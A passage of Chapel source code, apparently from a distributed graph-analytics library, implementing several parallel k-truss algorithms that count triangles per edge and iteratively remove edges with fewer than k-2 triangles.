}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive List Intersection Seq,Given k="+k:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Seq,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Seq,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Seq,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaiveListIntersectionSeq
// For undirected graph, using Naive and list intersection method. It should have worst performance.
// This procedure is just used for worst case test
proc kTrussNaivePathMerge(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
// first we calculate the number of triangles
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge {
TriCount[i]=0;
var u = src[i];
var v = dst[i];
var beginUf=start_i[u];
var endUf=beginUf+nei[u]-1;
var beginUb=start_iR[u];
var endUb=beginUb+neiR[u]-1;
var beginVf=start_i[v];
var endVf=beginVf+nei[v]-1;
var beginVb=start_iR[v];
var endVb=beginVb+neiR[v]-1;
var iu:int;
var jv:int;
var eu:int;
var ev:int;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
iu=beginUf;
jv=beginVf;
//writeln("Enter while 1 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVf)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dst[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUf;
jv=beginVb;
//writeln("Enter while 2 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVb)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dst[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVf;
//writeln("Enter while 3 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVf)) {
eu=findEdge(dstR[iu],u);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dstR[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVb;
//writeln("Enter while 4 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVb)) {
eu=findEdge(dstR[iu],u);
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dstR[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
//writeln("Remove edge ",i, " in iteration ", N2);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive Path Merge,Given k="+k:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Path Merge,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Path Merge,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Path Merge,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaivePathMerge
//For undirected graphs, we use list intersection to calculate the number of triangles,
//while the affected-edge search remains the normal method.
//This procedure is used to show how list intersection affects performance compared with our edge-search method.
proc kTrussNaiveMinSearch(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
//To have unique results, we remove the duplicated edges.
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the timer
// we first removed the duplicated and cycle edges.
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
//writeln("For k=",k," We have removed the edge ",i, "=<",v1,",",v2,">");
//writeln("Degree of ",v1,"=",nei[v1]+neiR[v1]," Degree of ",v2, "=",nei[v2]+neiR[v2]);
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
{
// first we calculate the number of triangles using list intersection method.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
forall x in dst[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(x,u);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
forall x in dst[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(x,v);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
forall s in uadj with ( + reduce Count) {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
// I found that the contains operation is very expensive in Chapel, we should avoid it.
// This is the reason why list intersection has bad performance
Count +=1;
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we remove as many edges as possible in the following code in once iteration
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
SetNextF.add((i,tmpe));
SetNextF.add((i,j));
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
SetNextF.add((i,j));
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
SetNextF.add((i,tmpe));
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1==-1) {
//writeln("Error! Cannot find the edge ",j,"=(",v4,",",v3,")");
} else {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
SetNextF.add((i,tmpe));
SetNextF.add((i,e1));
} else {
if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
SetNextF.add((i,e1));
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
var rset = new set((int,int), parSafe = true);
forall (i,j) in SetNextF with(ref rset) {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
rset.add((i,j));// just want (i,j) is unique in rset
}
}// end of forall
for (i,j) in rset {
if (EdgeDeleted[j]==-1) {
TriCount[j]-=1;
if (TriCount[j]<k-2) {
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
} //end on loc
} //end coforall loc in Locales
RemovedEdge+=SetCurF.getSize();
tmpN2+=1;
SetNextF.clear();
}// end of while
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
//writeln("remove the ",tmpi, " edge ",i);
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive Min Search,Given K="+k:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Min Search,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Min Search,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Min Search,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
}// end of proc KTruss Naive Min Search
//For undirected graphs, we use the triangle-search method. This should be our typical method,
//and its performance should be good.
proc kTruss(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//First off, we remove the duplicated and cycle edges. This is common for all methods.
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
{
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u;
lV=v;
ldV=dv;
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
forall x in dst[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref sVadj) {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
forall s in sVadj with ( + reduce Count) {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<=ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i].write(Count);
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
// here we mark the edges whose number of triangles is less than k-2 as 1-k
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<=dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
